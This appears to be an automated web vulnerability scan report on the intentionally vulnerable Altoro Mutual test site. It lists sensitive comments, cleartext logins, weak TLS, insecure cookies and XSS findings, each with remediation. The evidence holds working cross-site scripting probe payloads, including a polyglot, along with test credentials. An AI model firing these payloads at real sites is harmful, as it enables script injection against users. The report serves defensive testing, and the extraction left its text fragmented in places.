DetectionDetails: Limit Exceeded. 9 more item(s) were reported.
GET - http://demo.testfire.net/index.jsp?content=personal.htm
GET - http://demo.testfire.net/index.jsp?content=business.htm
GET - http://demo.testfire.net/subscribe.jsp
POST - http://demo.testfire.net/doSubscribe
GET - http://demo.testfire.net/default.jsp?content=security.htm
GET - http://demo.testfire.net/survey_questions.jsp
GET - http://demo.testfire.net/survey_questions.jsp?step=a
GET - http://demo.testfire.net/status_check.jsp
GET - http://demo.testfire.net/swagger/index.html
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
URL: https://demo.testfire.net:8443/index.jsp
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net:8443/index.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET https://demo.testfire.net:8443/index.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117/feedback.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Dave- Hard code this into the final script - Possible security
problem.
Re-generated every Tuesday and old files are saved
to .bak format at L:\backup\website\oldfiles --->
Request: GET https://65.61.137.117/feedback.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4
Remediation:
Remove comments which have sensitive information about the
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117/
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net/disclaimer.htm?url=http://www.netscape.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
authorization
Request: GET https://demo.testfire.net/disclaimer.htm?url=http://www.netscape.com HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
POST - https://demo.testfire.net:8443/sendFeedback
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: POST https://demo.testfire.net:8443/sendFeedback HTTP/1.1
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B
Origin: https://demo.testfire.net:8443
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net:8443/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 126
Content-Type: application/x-www-form-urlencoded
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.biz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net/index.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET http://demo.testfire.net/index.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117:8443/disclaimer.htm?url=http://www.netscape.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
Request: GET
https://65.61.137.117:8443/disclaimer.htm?url=http://www.netscape.c
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117/disclaimer.htm?url=http://www.netscape.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
authorization
Request: GET https://65.61.137.117/disclaimer.htm?url=http://www.netscape.com HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117/login.jsp
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-6159 -->
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
POST - https://65.61.137.117/doLogin
Potentially sensitive comments found
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net:8443/disclaimer.htm?url=http://www.netscape.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
Request: GET https://demo.testfire.net:8443/disclaimer.htm?url=http://www.netscape.com HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net:8443/index.jsp?content=inside_contact.
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net/index.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET https://demo.testfire.net/index.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3
Remediation:
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net/search.jsp?query=_WSETESTDATA
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net/feedback.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Dave- Hard code this into the final script - Possible security
problem.
Re-generated every Tuesday and old files are saved
to .bak format at L:\backup\website\oldfiles --->
Request: GET http://demo.testfire.net/feedback.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117/disclaimer.htm?url=http://www.netscape.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
authorization
Request: GET http://65.61.137.117/disclaimer.htm?url=http://www.netscape.com HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://cwe.mitre.org/data/definitions/615.html
Evidence:
DetectionDetails: HTML or Javascript comments found
POST - http://65.61.137.117/doLogin
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.
119 Web Page Transmits Login Credentials Without Encryption 4.6 Medium Fail
URL: http://65.61.137.117/login.jsp
Port: tcp/80
There is a web page on this host that transmits login credentials over
HTTP, which is a clear-text protocol. As such, if an attacker was able to
intercept traffic containing login credentials, it would be trivial to view
user account and password information.
CVSSv2: AV:A/AC:H/Au:N/C:C/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
Form Name: login
Action: http://65.61.137.117:80/doLogin
Fields: uid (text), passw (password), btnSubmit (submit)
Location: http://65.61.137.117/login.jsp
Remediation:
All web application communications containing sensitive information
should be transmitted using SSL/TLS (HTTPS). If re-direction from HTTP
to HTTPS is utilized in an attempt to remediate this finding, please
ensure that such redirection occurs on the server side of the system
(for example via the use of the HTTP "Location" header element) and
that redirection is not reliant upon the client (browser) side.
120 Web Page Transmits Login Credentials Without Encryption 4.6 Medium Fail
URL: http://demo.testfire.net:8080/login.jsp
Port: tcp/8080
There is a web page on this host that transmits login credentials over
CVSSv2: AV:A/AC:H/Au:N/C:C/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
Form Name: login
Action: http://demo.testfire.net:8080/doLogin
Fields: uid (text), passw (password), btnSubmit (submit)
Location: http://demo.testfire.net:8080/login.jsp
Remediation:
All web application communications containing sensitive information
should be transmitted using SSL/TLS (HTTPS). If re-direction from HTTP
to HTTPS is utilized in an attempt to remediate this finding, please
ensure that such redirection occurs on the server side of the system
(for example via the use of the HTTP "Location" header element) and
that redirection is not reliant upon the client (browser) side.
121 Web Page Transmits Login Credentials Without Encryption 4.6 Medium Fail
URL: http://65.61.137.117:8080/login.jsp
Port: tcp/8080
There is a web page on this host that transmits login credentials over
HTTP, which is a clear-text protocol. As such, if an attacker was able to
intercept traffic containing login credentials, it would be trivial to view
user account and password information.
Evidence:
Form Name: login
Action: http://65.61.137.117:8080/doLogin
Fields: uid (text), passw (password), btnSubmit (submit)
Location: http://65.61.137.117:8080/login.jsp
Remediation:
All web application communications containing sensitive information
should be transmitted using SSL/TLS (HTTPS). If re-direction from HTTP
to HTTPS is utilized in an attempt to remediate this finding, please
ensure that such redirection occurs on the server side of the system
(for example via the use of the HTTP "Location" header element) and
that redirection is not reliant upon the client (browser) side.
122 Web Page Transmits Login Credentials Without Encryption 4.6 Medium Fail
URL: http://demo.testfire.net/login.jsp
Port: tcp/80
There is a web page on this host that transmits login credentials over
HTTP, which is a clear-text protocol. As such, if an attacker was able to
intercept traffic containing login credentials, it would be trivial to view
user account and password information.
CVSSv2: AV:A/AC:H/Au:N/C:C/I:N/A:N
Service: http
Application: apache:tomcat
Remediation:
All web application communications containing sensitive information
should be transmitted using SSL/TLS (HTTPS). If re-direction from HTTP
to HTTPS is utilized in an attempt to remediate this finding, please
ensure that such redirection occurs on the server side of the system
(for example via the use of the HTTP "Location" header element) and
that redirection is not reliant upon the client (browser) side.
123 CVE-2011-3389 SSLv2, SSLv3 and TLS v1.0 Vulnerable to CBC Attacks via chosen-plaintext (BEAST) 4.3 Medium Fail
Port: tcp/443
This server supports a version of SSL vulnerable to a Cipher Block
Chaining (CBC) attack. When using a block-based cipher with SSLv2,
SSLv3 or TLS v1.0, it is possible to perform a cryptographic attack
called a chosen-plaintext attack. An attack, commonly known as
"Browser Exploit Against SSL/TLS" ("BEAST") takes advantage of this
vulnerability in how the browser sets up SSL/TLS connections (e.g. for
HTTPS), and may allow an attacker to decrypt the SSL/TLS connection
to gain access to sensitive information. Although, the BEAST attack is
the only known exploit, other services not related to web servers (e.g.
IMAP) may also be vulnerable to such attack.
CVE: CVE-2011-3389
CVSSv2: AV:N/AC:M/Au:N/C:P/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat
Reference:
http://httpd.apache.org/docs/trunk/mod/mod_ssl.html#sslciphersuite
http://support.microsoft.com/kb/2643584
http://technet.microsoft.com/en-us/security/advisory/2588513
Evidence:
Cipher Suite: TLSv1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES128-SHA
Remediation:
The server should be configured to allow only TLS versions 1.1 and 1.2,
which are not vulnerable to this CBC attack. Although the latest
versions of all major web browsers have TLS 1.1 and 1.2 enabled by
default, disabling earlier versions may prevent services other than
HTTP from connecting to the server if they do not support these
versions of TLS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://demo.testfire.net:8443/util/serverStatusCheckService.jsp?HostN
ame=%3Cscript%3Ealert%2815650661.00947%29%3C%2Fscript%3E -
HostName
Injection: <script>alert(15650661.00947)</script>
Detection: An alert was detected containing 15650661.00947
Request: GET https://demo.testfire.net:
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - https://demo.testfire.net/sendFeedback - email_addr
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650658.00617)//>*/alert(15650658.00617)/*
Detection: An alert was detected containing 15650658.00617
cfile=comments.txt&name=CHSuser&email_addr=javascript%3A%2F%
2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3
C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650658.00617%29%2F%
2F%3E*%2Falert%2815650658.00617%29%2F*&subject=_WSETESTDA
TA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET - https://65.61.137.117:8443/util/serverStatusCheckService.jsp?
Request: GET
https://65.61.137.117:8443/util/serverStatusCheckService.jsp?HostNam
e=%3Cscript%3Ealert%2815650661.00947%29%3C%2Fscript%3E
HTTP/1.1
Referer: https://65.61.137.117:8443/status_check.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://65.61.137.117:8080/search.jsp?query=%3Cscript%3Ealert%2815
650660.00037%29%3C%2Fscript%3E - query
Injection: <script>alert(15650660.00037)</script>
Detection: An alert was detected containing 15650660.00037
Request: GET
http://65.61.137.117:8080/search.jsp?query=%3Cscript%3Ealert%2815
650660.00037%29%3C%2Fscript%3E HTTP/1.1
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://www.owasp.org/index.php/Testing_for_cookies_attributes_%28OTG-SESS-002%29
Evidence:
DetectionDetails: Cookie Vulnerabilities Found
jsessionid = 76aa5ac0228d700d9219ed73f9533b78
Path = /
Host = 65.61.137.117
Cookie does not have a secure attribute
Cookie can be cached. Missing cache control and pragma tags
Request: GET http://65.61.137.117:8080/ HTTP/1.1
Upgrade-Insecure-Requests: 1
Remediation:
The Secure flag must be set on session cookies for applications served
over SSL.
For all session cookies, the HttpOnly flag would limit session access in
cases of Cross-Site Scripting issues. Proper caching headers should be
set for responses carrying the cookie.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://65.61.137.117:8443/search.jsp?query=%3Cscript%3Ealert%281
5650661.00037%29%3C%2Fscript%3E - query
Injection: <script>alert(15650661.00037)</script>
Detection: An alert was detected containing 15650661.00037
Request: GET
https://65.61.137.117:8443/search.jsp?query=%3Cscript%3Ealert%281
5650661.00037%29%3C%2Fscript%3E HTTP/1.1
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117:8443/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://65.61.137.117/index.jsp?content=javascript%3A%2F%2F%27%2
F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fscrip
t%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650656.00127%29%2F%
2F%3E*%2Falert%2815650656.00127%29%2F* - content
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650656.00127)//>*/alert(15650656.00127)/*
Detection: An alert was detected containing 15650656.00127
Request: GET
http://65.61.137.117/index.jsp?content=javascript%3A%2F%2F%27%2
F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fscrip
t%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650656.00127%29%2F%
2F%3E*%2Falert%2815650656.00127%29%2F* HTTP/1.1
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - https://65.61.137.117/sendFeedback - email_addr
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650642.00617)//>*/alert(15650642.00617)/*
Detection: An alert was detected containing 15650642.00617
cfile=comments.txt&name=CHSuser&email_addr=javascript%3A%2F%
2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3
C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650642.00617%29%2F%
2F%3E*%2Falert%2815650642.00617%29%2F*&subject=_WSETESTDA
TA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://65.61.137.117/util/serverStatusCheckService.jsp?HostName=%3
Cscript%3Ealert%2815650656.00947%29%3C%2Fscript%3E -
HostName
Request: GET
http://65.61.137.117/util/serverStatusCheckService.jsp?HostName=%3
Cscript%3Ealert%2815650656.00947%29%3C%2Fscript%3E HTTP/1.1
Referer: http://65.61.137.117/status_check.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://www.owasp.org/index.php/Testing_for_cookies_attributes_%28OTG-SESS-002%29
Evidence:
DetectionDetails: Cookie Vulnerabilities Found
jsessionid = 03939398ea63ccaee93295dc28e42282
Path = /
Host = demo.testfire.net
Cookie does not have a secure attribute
Cookie can be cached. Missing cache control and pragma tags
Request: GET http://demo.testfire.net:8080/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
The Secure flag must be set on session cookies for applications served
over SSL.
For all session cookies, the HttpOnly flag would limit session access in
cases of Cross-Site Scripting issues. Proper caching headers should be
set for responses carrying the cookie.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://demo.testfire.net:8080/search.jsp?query=%3Cscript%3Ealert%28
15650659.00037%29%3C%2Fscript%3E - query
Injection: <script>alert(15650659.00037)</script>
Detection: An alert was detected containing 15650659.00037
Request: GET
http://demo.testfire.net:8080/search.jsp?query=%3Cscript%3Ealert%28
15650659.00037%29%3C%2Fscript%3E HTTP/1.1
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
